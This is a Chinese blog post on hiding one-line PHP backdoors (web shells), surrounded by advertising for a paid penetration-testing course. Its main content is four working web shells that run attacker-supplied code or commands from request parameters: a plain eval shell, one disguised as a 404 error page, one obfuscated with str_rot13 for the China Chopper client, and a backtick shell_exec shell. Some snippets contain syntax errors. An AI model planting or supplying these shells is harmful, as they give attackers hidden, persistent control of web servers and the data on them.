PHP一句话后门隐藏技术

2019年03月21日 22:58:01 作者:必火 阅读数:3547132
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:15320004362(手机同微信)。全国诚招招生代理,最低2000元起
第九期开班时间:2021年3月22日

抢先领取全套VIP视频教程

+10天免费学习名额

  已有8166人参加


视频课程

姓名 选填

电话


  张*燕188****220722分钟前

  王*军186****864498分钟前

  李*如189****445354分钟前

>>  稍后老师联系您发送相关视频课程  <<



报名CTF挑战赛,  预约名师指导

  已有 2366 人参加
姓名 选填

电话


  郭*明170****234291分钟前

  赵*东189****289646分钟前

  蔡*培135****589722分钟前





   

网络安全渗透测试群(必火安全学院):信息安全渗透测试群

护网行动日薪千元(初级中级高级)群:护网行动必火业余班级


0x01: eval函数构造的后门

最为常见,最多使用

<?php eval($_POST['nvhack'];?>
<?php @eval($_POST['nvhack']);?>//容错代码
<?php system($_REQUEST['nvhack']);?>//执行命令

0x02: 利用404ye面隐藏后门

<?php
@preg_replace("/[pageerror]/",$_POST['error'],'nvhack.com');
header('HTTP/1.1 404 Not Found');
?>

0x03: 无特征隐藏一句话后门

通过编码转换 str_rot13('riny') 即编码后的eva,使用中国菜刀连接。密码为nvhack

<?php $nvhack = $_POST['nvhack']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($nvhack)','add');?>

0x04:利用shell_exec函数的后门

要注意 ,php.ini 配置文件中的disable_funcgtions 没有禁用shell_exec

<?php
$nvhack = $_GET['r'];
echo `$nvhack`;
?>